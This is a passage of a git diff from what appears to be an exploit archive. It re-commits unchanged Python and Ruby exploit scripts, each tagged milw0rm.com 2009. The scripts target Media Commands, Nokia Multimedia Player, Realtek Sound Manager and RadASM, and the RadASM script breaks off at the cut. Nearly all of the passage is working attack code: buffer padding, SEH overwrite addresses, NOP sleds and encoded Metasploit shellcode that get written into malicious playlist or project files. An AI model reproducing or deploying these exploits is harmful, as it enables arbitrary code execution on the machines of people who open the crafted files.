+"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"+
+"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54"+
+"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x32\x4b\x58"+
+"\x49\x48\x4e\x46\x46\x32\x4e\x41\x41\x56\x43\x4c\x41\x43\x4b\x4d"+
+"\x46\x46\x4b\x58\x43\x34\x42\x43\x4b\x48\x42\x34\x4e\x50\x4b\x58"+
+"\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x34\x4a\x50\x50\x35\x4a\x36"+
+"\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46"+
+"\x43\x35\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x46\x47\x47\x43\x37"+
+"\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"+
+"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"+
+"\x48\x36\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x30"+
+"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"+
+"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x35\x43\x45\x43\x55\x43\x34"+
+"\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x45\x41"+
+"\x43\x4b\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x39\x4a\x56\x46\x4a"+
+"\x4c\x31\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41"+
+"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"+
+"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"+
+"\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d"+
+"\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56"+
+"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x35"+
+"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x46"+
+"\x4d\x46\x49\x48\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x32\x4e\x4c"+
+"\x49\x48\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c"+
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x44\x4e\x32"+
+"\x43\x39\x4d\x58\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"+
+"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"+
+"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x45\x41\x45\x41\x45\x4c\x56"+
+"\x41\x30\x41\x45\x41\x55\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x56"+
+"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"+
+"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x58\x47\x45\x4e\x4f"+
+"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"+
+"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x55\x43\x55\x4f\x4f\x48\x4d"+
+"\x4f\x4f\x42\x4d\x5a"
+Bof    =  "\x41" * 4097
+Nseh = "\xEB\x06\x90\x90"
+seh  = "\x35\x2F\xC6\x72"
+Nop  = "\x90" * 15
+crash =  Header + Bof + Nseh + seh + Nop + Shellcode
+File.open( moad+".m3l", "w" ) do |the_file|
+the_file.puts(crash)
+puts "Exploit finished in Current Time :" + time1.inspect
+puts "Now Open " + moad +".m3l :d"
+end
+
+# milw0rm.com [2009-03-05]
diff --git a/platforms/windows/local/8162.py b/platforms/windows/local/8162.py
index d71798f02..5af9232c0 100755
--- a/platforms/windows/local/8162.py
+++ b/platforms/windows/local/8162.py
@@ -1,60 +1,60 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " Media Commands (m3u File) Universal Seh Overwrite Exploit\n"
-print " Founder: Hakxer"
-print " Exploited by : His0k4"
-print " Another Exploiter : Stack"
-print " Tested on: Windows XP Pro SP2 Fr\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz)\n"
-print "**************************************************************************"
-         	
-
-			
-			
-buff = "\x41" * 4103
-
-next_seh = "\xEB\x06\x90\x90" 
-
-seh = "\x9F\x20\x01\x10" #Universal pop pop ret :p
-
-
-nop = "\x90" * 19
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-shellcode = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-"\x42\x30\x42\x30\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x47"
-"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
-"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38"
-"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x58"
-"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
-"\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x48"
-"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
-"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x47"
-"\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x57\x4e\x51\x4d\x4a"
-"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
-"\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x46\x4e\x43\x4f\x45\x41\x53"
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
-"\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x56\x4a\x59"
-"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36"
-"\x4e\x36\x43\x36\x42\x50\x5a"
-    )
-
-exploit = buff + next_seh + seh + nop + shellcode
-
-try:
-    out_file = open("exploit.m3u",'w')
-    out_file.write(exploit)
-    out_file.close()
-    print "Exploit File Created!"
-except:
-    print "Error"
-
-# milw0rm.com [2009-03-05]
+#usage: exploit.py
+print "**************************************************************************"
+print " Media Commands (m3u File) Universal Seh Overwrite Exploit\n"
+print " Founder: Hakxer"
+print " Exploited by : His0k4"
+print " Another Exploiter : Stack"
+print " Tested on: Windows XP Pro SP2 Fr\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz)\n"
+print "**************************************************************************"
+         	
+
+			
+			
+buff = "\x41" * 4103
+
+next_seh = "\xEB\x06\x90\x90" 
+
+seh = "\x9F\x20\x01\x10" #Universal pop pop ret :p
+
+
+nop = "\x90" * 19
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+shellcode = (
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+"\x42\x30\x42\x30\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x48\x4e\x47"
+"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
+"\x4f\x35\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38"
+"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x55\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x58"
+"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
+"\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x48"
+"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
+"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x47"
+"\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x57\x4e\x51\x4d\x4a"
+"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
+"\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x46\x4e\x43\x4f\x45\x41\x53"
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
+"\x42\x45\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x56\x4a\x59"
+"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x36"
+"\x4e\x36\x43\x36\x42\x50\x5a"
+    )
+
+exploit = buff + next_seh + seh + nop + shellcode
+
+try:
+    out_file = open("exploit.m3u",'w')
+    out_file.write(exploit)
+    out_file.close()
+    print "Exploit File Created!"
+except:
+    print "Error"
+
+# milw0rm.com [2009-03-05]
diff --git a/platforms/windows/local/8171.py b/platforms/windows/local/8171.py
index 5d5bd6ee4..268dd5c1b 100755
--- a/platforms/windows/local/8171.py
+++ b/platforms/windows/local/8171.py
@@ -1,60 +1,60 @@
-#usage: exploit.py
-print "**************************************************************************"
-print " Nokia Multimedia Player 1.0 (playlist) Universal Seh Overwrite Exploit\n"
-print " Founder : 0in"
-print " Exploited by : His0k4"
-print " Tested on: Windows XP Pro SP2 Fr\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz)\n"
-print "**************************************************************************"
-         	
-
-			
-buff = "\x41" * 1880
-
-next_seh = "\xEB\x06\x41\x41"
-
-nops = "\x90"*19
-
-seh = "\x0E\xD2\x8E\x01" #yes universal :D
-
-
-
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
-shellcode = (
-	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-	"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67"
-	"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32"
-	"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b"
-	"\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c"
-	"\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74"
-	"\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37"
-	"\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f"
-	"\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b"
-	"\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38"
-	"\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44"
-	"\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47"
-	"\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f"
-	"\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39"
-	"\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37"
-	"\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b"
-	"\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31"
-	"\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b"
-	"\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71"
-	"\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72"
-	"\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67"
-    )
-
-	
-exploit = buff + next_seh + seh + nops + shellcode
-	
-try:
-    out_file = open("nokia.npl",'w')
-    out_file.write(exploit)
-    out_file.close()
-    print "Exploit file created!\n"
-except:
-    print "Error"
-
-# milw0rm.com [2009-03-09]
+#usage: exploit.py
+print "**************************************************************************"
+print " Nokia Multimedia Player 1.0 (playlist) Universal Seh Overwrite Exploit\n"
+print " Founder : 0in"
+print " Exploited by : His0k4"
+print " Tested on: Windows XP Pro SP2 Fr\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz)\n"
+print "**************************************************************************"
+         	
+
+			
+buff = "\x41" * 1880
+
+next_seh = "\xEB\x06\x41\x41"
+
+nops = "\x90"*19
+
+seh = "\x0E\xD2\x8E\x01" #yes universal :D
+
+
+
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
+shellcode = (
+	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
+	"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67"
+	"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32"
+	"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b"
+	"\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c"
+	"\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74"
+	"\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37"
+	"\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f"
+	"\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b"
+	"\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38"
+	"\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44"
+	"\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47"
+	"\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f"
+	"\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39"
+	"\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37"
+	"\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b"
+	"\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31"
+	"\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b"
+	"\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71"
+	"\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72"
+	"\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67"
+    )
+
+	
+exploit = buff + next_seh + seh + nops + shellcode
+	
+try:
+    out_file = open("nokia.npl",'w')
+    out_file.write(exploit)
+    out_file.close()
+    print "Exploit file created!\n"
+except:
+    print "Error"
+
+# milw0rm.com [2009-03-09]
diff --git a/platforms/windows/local/8174.py b/platforms/windows/local/8174.py
index 541663b62..154e9f380 100755
--- a/platforms/windows/local/8174.py
+++ b/platforms/windows/local/8174.py
@@ -1,53 +1,53 @@
-#!/usr/bin/python
-print "**************************************************************************"
-print "[*] Realtek Sound Manager 1.15.0.0 (PlayList) Seh Overwrite Exploit\n"
-print "[*] Author: shinnai"
-print "[*] Seh Exploitation : His0k4"
-print "[*] Tested on: Windows XP SP2 (Fr)\n"
-print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
-print "**************************************************************************"
-
-buff = "\x41" * 200
-
-next_seh = "\xEB\x06\x90\x90"
-
-seh = "\xBE\x2E\xC6\x72" #pop pop ret  msacm32.drv
-
-buff2 = "\x44"*1989
-
-shellcode = (
-    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-    "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
-    "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
-    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
-    "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
-    "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
-    "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
-    "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
-    "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
-    "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
-    "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
-    "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
-    "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
-    "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
-    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
-    "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
-    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
-    "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
-    )
-
-exploit = buff + next_seh + seh + shellcode + buff2
-
-try:
-    out_file = open("exploit.pla",'w')
-    out_file.write(exploit)
-    out_file.close()
-    print "Exploit File Created!\nNow import it from Realtek"
-except:
-    print "Error"
-
-# milw0rm.com [2009-03-09]
+#!/usr/bin/python
+print "**************************************************************************"
+print "[*] Realtek Sound Manager 1.15.0.0 (PlayList) Seh Overwrite Exploit\n"
+print "[*] Author: shinnai"
+print "[*] Seh Exploitation : His0k4"
+print "[*] Tested on: Windows XP SP2 (Fr)\n"
+print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
+print "**************************************************************************"
+
+buff = "\x41" * 200
+
+next_seh = "\xEB\x06\x90\x90"
+
+seh = "\xBE\x2E\xC6\x72" #pop pop ret  msacm32.drv
+
+buff2 = "\x44"*1989
+
+shellcode = (
+    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+    "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
+    "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
+    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
+    "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
+    "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
+    "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
+    "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
+    "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
+    "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
+    "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
+    "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
+    "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
+    "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
+    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
+    "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
+    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+    "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
+    )
+
+exploit = buff + next_seh + seh + shellcode + buff2
+
+try:
+    out_file = open("exploit.pla",'w')
+    out_file.write(exploit)
+    out_file.close()
+    print "Exploit File Created!\nNow import it from Realtek"
+except:
+    print "Error"
+
+# milw0rm.com [2009-03-09]
diff --git a/platforms/windows/local/8177.py b/platforms/windows/local/8177.py
index 2b903570e..da56cffdb 100755
--- a/platforms/windows/local/8177.py
+++ b/platforms/windows/local/8177.py
@@ -1,45 +1,45 @@
-#!/usr/bin/python
-# RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit
-# Exploited By : zAx
-# Discovered and Idea By  : Encrypt3d.M!nd
-# Tested On : Windows XP ServicePack 2 English.
-# Thanks to : All My Friends.
-print "  RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit"
-print "  Written By : zAx"
-print "  Contact : ThE-zAx@Hotmail.Com"
-header = "[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1="
-zAx = "c4ca4238a0b923820dcc509a6f75849bc81e728d9d4c2f636f067f89cc14862ceccbc87e4b5ce2fe28308fd9f2a7baf3a87ff679a2f3e71d9181a67b7542122ce4da3b7fbbce2345d7772b0674a318d51679091c5a880faf6fb5e6087eb1b2dc8f14e45fceea167a5a36dedd4bea2543c9"
-eip = "\x5D\x38\x82\x7C" # KERNEL32.DLL ESP In Windows SP2 EN
-nopsled = "\x90"*20
-#win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
-shellcode = (
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-"\x42\x50\x42\x30\x42\x30\x4b\x58\x45\x54\x4e\x43\x4b\x48\x4e\x57"
-"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38"
-"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x48"
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x45\x46\x32\x46\x50\x45\x57\x45\x4e\x4b\x58"
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
-"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
-"\x41\x30\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x53"
-"\x42\x4c\x46\x56\x4b\x48\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37"
-"\x4e\x50\x4b\x58\x42\x44\x4e\x30\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
-"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x53\x4f\x45\x41\x43"
-"\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
-"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x46\x4a\x59"
-"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
-"\x4e\x46\x43\x46\x50\x42\x45\x46\x4a\x47\x45\x36\x42\x30\x5a"
-)
-stack =  header + zAx + eip + nopsled + shellcode + nopsled
-file=open("zAx.rap","w")
-file.write(stack)
-file.close()
-raw_input("\nExploit file created!, Now Go to RadASM and Open Our Devil Project :D\n")
-
-# milw0rm.com [2009-03-09]
+#!/usr/bin/python
+# RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit
+# Exploited By : zAx
+# Discovered and Idea By  : Encrypt3d.M!nd
+# Tested On : Windows XP ServicePack 2 English.
+# Thanks to : All My Friends.
+print "  RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit"
+print "  Written By : zAx"
+print "  Contact : ThE-zAx@Hotmail.Com"
+header = "[Project]\nAssembler=masm\nGroup=1\nGroupExpand=1\n[Files]\n1="
+zAx = "c4ca4238a0b923820dcc509a6f75849bc81e728d9d4c2f636f067f89cc14862ceccbc87e4b5ce2fe28308fd9f2a7baf3a87ff679a2f3e71d9181a67b7542122ce4da3b7fbbce2345d7772b0674a318d51679091c5a880faf6fb5e6087eb1b2dc8f14e45fceea167a5a36dedd4bea2543c9"
